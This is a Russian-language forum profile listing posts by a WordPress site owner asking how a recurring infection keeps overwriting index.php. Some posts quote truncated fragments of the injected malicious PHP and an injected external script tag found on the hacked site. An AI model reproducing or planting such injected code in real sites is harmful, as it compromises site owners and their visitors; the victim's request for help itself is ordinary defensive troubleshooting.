Jump to content

bysel

Новичок
  • Content Count

    4
  • Joined

  • Last visited

About bysel

  • Rank
    Новичок

Profile Information

  • Специализация
    Другое

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Добрый день! Имеем: пользователей фтп всех удалили пароль от админки убер сложный у админа не стандартный логи других левых админов нету все файлы чистые на хостинге С периодичностью раз в 2 дня где-то перезаписывается index.php лежащий в корне файла. Помогите гуру ) куда копать? странность в том что перезаписывает только index.php , никаких других файлов не заражает. <?php @set_time_limit(3600); @ignore_user_abort(1); $xmlname = 'mapss200.xml'; $jdir = ''; $smuri_tmp = smrequest_uri(); if($smuri_tmp==''){ $smuri_tmp='/'; } $smuri = base64_encode
  2. Подоплёка вопроса в том, что есть вордрпесс 4.8.1 на хостинге. Вирусы удалили, левые аккаунты удалили, пароль сложный стоит. Тема на сайте стоит стандартная twentyten. НО! Раз в 1-2 дня файл index.php перезаписывается вот такой вот ерундой https://pastebin.com/7b00Xm9g , никакие файлы больше не трогаются, никаких вирусных вставок нигде больше нету. В итоге обычные журналы WWW-запросов в ISP-manager не дают полную информацию. Может есть какой-то анализатор запросов к файлам который пишет какие данные были посланы в реквесте пост запроса? Либо как средствами хостинга это отследить?
  3. Благодарю за быстрый ответ, это именно то что надо!
  4. Добрый день. Что имеем: 1. Сложные пароли от админа - 13 символов+спецсимволы. 2. Обновлённый до 4.8.1 вордпресс 3. Проверенные айболитом и прочими антивирусниками файлы - всё чисто. 4. Тему NewspaperВерсия: 6.6.5 Что появляется: <div class="td-banner-wrap-full td-banner-bg"> <div class="td-container-header td-header-row td-header-header"> <div class="td-header-sp-recs"> <div class="td-header-rec-wrap"> <div class="td-a-rec td-a-rec-id-header "><script src='https://blue.traffictra
×
×
  • Create New...